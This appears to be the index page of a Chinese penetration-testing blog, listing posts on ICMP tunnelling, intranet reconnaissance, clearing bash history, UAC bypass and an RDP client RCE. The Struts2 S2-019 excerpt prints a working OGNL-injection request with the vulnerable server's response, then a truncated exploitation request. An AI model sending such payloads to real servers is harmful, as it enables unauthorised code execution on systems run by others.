Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

ICMP 隧道使用指南 (TCP over ICMP)

June 5, 2020

ICMP 隧道使用指南 (TCP over ICMP)

ICMP 隧道使用指南 (TCP over ICMP)

June 5, 2020

不使用 nmap 等常见网络工具判断各网络协议的连通性

不使用 nmap 等常见网络工具判断各网络协议的连通性

December 17, 2019

内网主机信息收集 (Windows)

内网主机信息收集 (Windows)

December 5, 2019

如何清除 bash 中的 history 命令记录

如何清除 bash 中的 history 命令记录

September 19, 2019

Windows UAC bypass

Windows UAC bypass <!–more–> 正文 User Account Control & odbcad32.exe https://secureyourit.co.uk/wp/2019/09/18/user-account-control-odbcad32-exe/

September 12, 2019

Struts2 S2-019 HTTP raw text

Struts2 S2-019 HTTP raw text <!–more–> 检测请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 492 Content-Type: application/x-www-form-urlencoded debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()HTTP/1.1 200 Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly Content-Type: text/plain;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Thu, 12 Sep 2019 07:42:15 GMT Connection: close 16 struts2_security_check 0 利用请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN […]

September 12, 2019

某道全版本rce漏洞分析

某道全版本rce漏洞分析 <!–more–> https://xz.aliyun.com/t/6239

September 11, 2019

CVE-2019-0788 微软远程桌面客户端远程任意代码执行漏洞

CVE-2019-0788 微软远程桌面客户端远程任意代码执行漏洞 <!–more–> 正文 mstsc 客户端连接 恶意 rdp 服务端时可能被服务端远程执行代码。 用途 内网钓鱼 蜜罐反打 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0788 https://www.tenable.com/blog/microsofts-september-2019-patch-tuesday-tenable-roundup

September 5, 2019

内网渗透中的定向思路

内网渗透中的定向思路 <!–more–> 正文 17、内网渗透测试定位技术总结 https://blog.csdn.net/Fly_hps/article/details/80644179

August 29, 2019

【优质渗透测试报告】对 Hacking Team 的渗透

【优质渗透测试报告】对 Hacking Team 的渗透